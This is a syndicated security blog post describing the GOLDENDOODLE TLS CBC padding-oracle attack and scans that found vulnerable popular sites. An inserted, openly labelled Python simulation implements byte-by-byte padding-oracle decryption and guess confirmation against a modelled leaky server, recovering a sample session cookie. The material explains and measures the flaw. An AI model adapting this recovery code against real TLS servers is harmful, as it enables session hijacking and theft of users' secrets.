This post is one in a series of posts describing TLS CBC padding oracles I have identified on popular web sites. The other posts in this series include an overview of CBC padding oracles, a walkthrough of how I came to develop a new CBC padding oracle scanner, and a write-up on the Zombie POODLE attack.
GOLDENDOODLE is the name I’ve given to exploiting modern TLS stacks using the classic CBC padding oracle technique described by Serge Vaudenay in 2002. GOLDENDOODLE can be used to hijack authenticated TLS sessions if the server reveals the padding validity of application data records in such a way that a MiTM attacker can recognize well-formed padding independently from a valid Message Authentication Code (MAC). This includes, but is not limited to, cases such as Cisco ASA CVE-2015-4458, where the system completely fails to validate the MAC.
From a practical standpoint, the difference between GOLDENDOODLE and Zombie POODLE or POODLE TLS is performance.
As noted in a separate blog post detailing how I came to research this topic and identify this behavior, GOLDENDOODLE attacks can be achieved with far fewer requests because the attacker has more control to manipulate the ciphertext without breaking the oracle response: GOLDENDOODLE oracles let the attacker confirm guessed values for plaintext bytes rather than waiting for random occurrences. In this post, I will detail the specifics of GOLDENDOODLE as observed during my scans of the Alexa top-ranked sites.
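To make the oracle concrete, the following is an added simulation of the behavior described in the two paragraphs above; it is not code from the original post or from the padcheck scanner. It assumes a 4-round SHA-256 Feistel network in place of AES-128 (so it runs on the standard library alone), an HMAC-SHA256 MAC over the content only (TLS also covers the sequence number and record header), a TLS 1.1+ record layout of IV || CBC(content || MAC || padding || padding_length), a leaky server modelled as returning a distinct "BAD_PADDING" reaction instead of the uniform bad_record_mac alert, and a constructed HTTP request as the secret. `recover_block` is the blind Vaudenay recovery; `confirm_byte_guess` is the two-query guess confirmation that gives GOLDENDOODLE its speed.

```python
# Added example (not code from the original post or the padcheck scanner):
# simulation of a TLS CBC padding oracle. Assumptions: a 4-round SHA-256
# Feistel network stands in for AES-128; the MAC is HMAC-SHA256 over the
# content only; the leaky server answers BAD_PADDING instead of a uniform
# bad_record_mac. Layout: IV || CBC( content || MAC || padding || pad_len ).
import hashlib
import hmac
import os

BLOCK, MAC_LEN = 16, 32

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, half, rnd):  # Feistel round function: keyed SHA-256 cut to 8 bytes
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def block_encrypt(key, block):
    l, r = block[:8], block[8:]
    for rnd in range(4):
        l, r = r, _xor(l, _f(key, r, rnd))
    return l + r

def block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _f(key, l, rnd)), l
    return l + r

def padded_plaintext(mac_key, content):
    """content || MAC || pad: every pad byte, the length byte included, equals pad_len."""
    body = content + hmac.new(mac_key, content, hashlib.sha256).digest()
    pad_len = (BLOCK - (len(body) + 1) % BLOCK) % BLOCK
    return body + bytes([pad_len]) * (pad_len + 1)

def build_record(key, mac_key, content, iv=None):
    pt = padded_plaintext(mac_key, content)
    out = prev = os.urandom(BLOCK) if iv is None else iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, _xor(pt[i:i + BLOCK], prev))
        out += prev
    return out

def server_decrypt(key, mac_key, record, leaky):
    """Correct stack: BAD_RECORD_MAC for pad *and* MAC failures. Leaky stack: pad leaks."""
    blocks = [record[i:i + BLOCK] for i in range(0, len(record), BLOCK)]
    pt, prev = b"", blocks[0]
    for c in blocks[1:]:
        pt, prev = pt + _xor(block_decrypt(key, c), prev), c
    pad_len = pt[-1]
    if pad_len + 1 > len(pt) or any(b != pad_len for b in pt[-(pad_len + 1):]):
        return "BAD_PADDING" if leaky else "BAD_RECORD_MAC"
    body = pt[:-(pad_len + 1)]
    expected = hmac.new(mac_key, body[:-MAC_LEN], hashlib.sha256).digest()
    return "OK" if hmac.compare_digest(body[-MAC_LEN:], expected) else "BAD_RECORD_MAC"

def _padding_ok(oracle, prev, target):  # anything but BAD_PADDING = well-formed pad
    return oracle(bytes(prev) + target) != "BAD_PADDING"

def recover_block(oracle, prev, target):
    """Vaudenay: learn D_k(target) byte by byte by forcing the decrypted tail into a
    valid pad of length 0..15, then unmask with the real previous block. None = no oracle."""
    inter = bytearray(BLOCK)
    for j in range(BLOCK - 1, -1, -1):
        pad_len, crafted = BLOCK - 1 - j, bytearray(BLOCK)
        for k in range(j + 1, BLOCK):
            crafted[k] = inter[k] ^ pad_len  # known bytes now decrypt to pad_len
        hits = []
        for v in range(256):
            crafted[j] = v
            if not _padding_ok(oracle, crafted, target):
                continue
            if j == BLOCK - 1:  # 0x00 alone is valid; rule out an accidental longer pad
                alt = bytearray(crafted)
                alt[j - 1] ^= 0xFF
                if not _padding_ok(oracle, alt, target):
                    continue
            hits.append(v)
        if len(hits) != 1:  # uniform responses (no leak) leave all 256 candidates
            return None
        inter[j] = hits[0] ^ pad_len
    return _xor(inter, prev)

def recover_record(oracle, record):
    blocks = [record[i:i + BLOCK] for i in range(0, len(record), BLOCK)]
    parts = [recover_block(oracle, p, t) for p, t in zip(blocks, blocks[1:])]
    return None if None in parts else b"".join(parts)

def confirm_byte_guess(oracle, prev, target, guess):
    """GOLDENDOODLE speed-up: two queries test one guess for a block's last byte.
    XORing the guess into the previous block makes that byte decrypt to 0x00 (a valid
    one-byte pad) exactly when the guess is right; flipping the byte before it in the
    second query rules out an accidental longer pad."""
    crafted = bytearray(prev)
    crafted[-1] ^= guess
    alt = bytearray(crafted)
    alt[-2] ^= 0xFF
    return _padding_ok(oracle, crafted, target) and _padding_ok(oracle, alt, target)

if __name__ == "__main__":
    key, mac_key = os.urandom(16), os.urandom(32)
    content = b"GET / HTTP/1.1\r\nCookie: session=SECRET-TOKEN\r\n\r\n"  # constructed sample
    record = build_record(key, mac_key, content)
    print(recover_record(lambda r: server_decrypt(key, mac_key, r, True), record))
    print(recover_record(lambda r: server_decrypt(key, mac_key, r, False), record))  # None
```

Against the leaky server the blind recovery needs up to 256 queries per byte, while confirming a candidate costs two; against the server that answers every malformed record identically the attacker cannot tell padding failures from MAC failures and `recover_block` returns None. In a real attack each query is a fresh connection, because a rejected record is fatal to the TLS session, so the victim must be induced to resend the secret in a controlled position, and the distinguishing signal is whatever the stack actually leaks (a different alert, a timing difference, or a difference in how the connection is torn down), not a literal "BAD_PADDING" reply.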
My most recent scans for GOLDENDOODLE (March 2019) identified exactly 750 vulnerable domains exhibiting 57 distinct behaviors out of the Alexa top 1M. This is down only slightly from initial scans in August 2018, which identified closer to 1,000 domains. This drop indicates that some number of sites did in fact deploy updates or configuration changes, perhaps in (Read more...)
*** This is a Security Bloggers Network syndicated blog from The State of Security authored by Craig Young. Read the original post at: https://www.tripwire.com/state-of-security/vert/goldendoodle-attack/